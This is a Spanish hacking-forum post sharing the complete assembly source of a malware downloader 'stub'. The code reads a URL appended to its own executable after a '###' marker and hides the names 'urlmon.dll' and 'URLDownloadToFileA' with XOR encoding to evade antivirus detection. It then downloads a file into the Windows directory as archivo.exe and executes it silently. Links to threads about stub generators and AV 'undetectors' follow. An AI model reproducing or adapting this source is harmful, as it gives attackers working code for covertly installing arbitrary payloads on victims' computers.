send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Stub mDownloader

  • 0 Respuestas
  • 1407 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Juan

  • *
  • Underc0der
  • Mensajes: 159
  • Actividad:
    0%
  • Reputación 0
  • Ex-Drinky
    • Ver Perfil
« en: Febrero 26, 2011, 12:55:36 pm »
Bueno, este es el código fuente del Stub del mDownloader, un Downloader programado por mi en Asm.

Código: ASM
  1. include 'win32ax.inc'
  2.  
  3. .data
  4.     manija dd ?
  5.     larchivo dd ?
  6.     espacio dd ?
  7.     bleidos dd ?
  8.     dll db 'rukjhi)ckk',0
  9.     funcion db 'RUKChpikhfcShAnkbF',0
  10.     añadir db '%windir%\archivo.exe',0
  11.     ruta dd ?
  12.  
  13. .code
  14. start:
  15.         xor  eax, eax
  16.         mov  eax, [FS:eax+0x30]
  17.         mov  eax, [DS:eax+0x10]
  18.         mov  eax, [DS:eax+0x3C]
  19.  
  20.         invoke CreateFileW,eax, GENERIC_READ, FILE_SHARE_READ, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0
  21.         mov [manija],eax
  22.         invoke GetFileSize,[manija],0
  23.         mov [larchivo],eax
  24.         invoke GlobalAlloc,GPTR,[larchivo]
  25.         mov [espacio],eax
  26.         invoke ReadFile,[manija],[espacio],[larchivo],addr bleidos,0
  27.         invoke CloseHandle,[manija]
  28.  
  29.         mov ecx,1
  30.         mov eax,[espacio]
  31.         add [larchivo],10
  32.         bucle:
  33.  
  34.             .if byte[eax+ecx] = '#'
  35.                 inc ecx
  36.                 .if byte[eax+ecx] = '#'
  37.                     inc ecx
  38.                     .if byte[eax+ecx] = '#'
  39.                         inc ecx
  40.                         add eax,ecx
  41.                         mov [espacio],eax
  42.                         jmp salir
  43.                     .endif
  44.                     dec ecx
  45.                 .endif
  46.                 dec ecx
  47.              .endif
  48.  
  49.              .if ecx > [larchivo]
  50.                  jmp salir
  51.              .endif
  52.  
  53.              inc ecx
  54.              jmp bucle
  55.  
  56.         salir:
  57.  
  58.         invoke GlobalAlloc,GPTR,1024
  59.         mov [ruta],eax
  60.         invoke ExpandEnvironmentStrings,añadir,[ruta],1024
  61.  
  62.         stdcall Cifrar,dll
  63.         invoke LoadLibrary,eax
  64.  
  65.         push eax
  66.         stdcall Cifrar,funcion
  67.         mov ecx,eax
  68.         pop eax
  69.  
  70.         invoke GetProcAddress,eax,ecx
  71.  
  72.         push 0
  73.         push 0
  74.         push [ruta]
  75.         push [espacio]
  76.         push 0
  77.  
  78.         call eax
  79.  
  80.         invoke ShellExecute,0,"open",[ruta],0,0,0
  81.  
  82.         leave
  83.         ret
  84.  
  85.         proc Cifrar,Cadena
  86.             xor ecx,ecx
  87.             mov eax,[Cadena]
  88.             .bucle:
  89.                 .if byte[eax+ecx] = 0
  90.                     jmp .salir
  91.                 .endif
  92.                 xor byte[eax+ecx],7
  93.                 inc ecx
  94.                 jmp .bucle
  95.             .salir:
  96.             ret
  97.          endp
  98. .end start    
  99.  

salu2!
« Última modificación: Diciembre 08, 2014, 02:42:08 pm por Expermicid »

 

¿Te gustó el post? COMPARTILO!



[SRC] Unique Stub Generator + Source Undetector

Iniciado por The Punisher

Respuestas: 1
Vistas: 4029
Último mensaje Mayo 10, 2010, 12:38:25 pm
por H4ZIR
Bifrost Stub Generator

Iniciado por Stiuvert

Respuestas: 9
Vistas: 3323
Último mensaje Noviembre 24, 2012, 12:35:42 pm
por alerod
Modeando desde el Stub!

Iniciado por ANTRAX

Respuestas: 2
Vistas: 1814
Último mensaje Abril 06, 2018, 09:22:00 am
por ANTRAX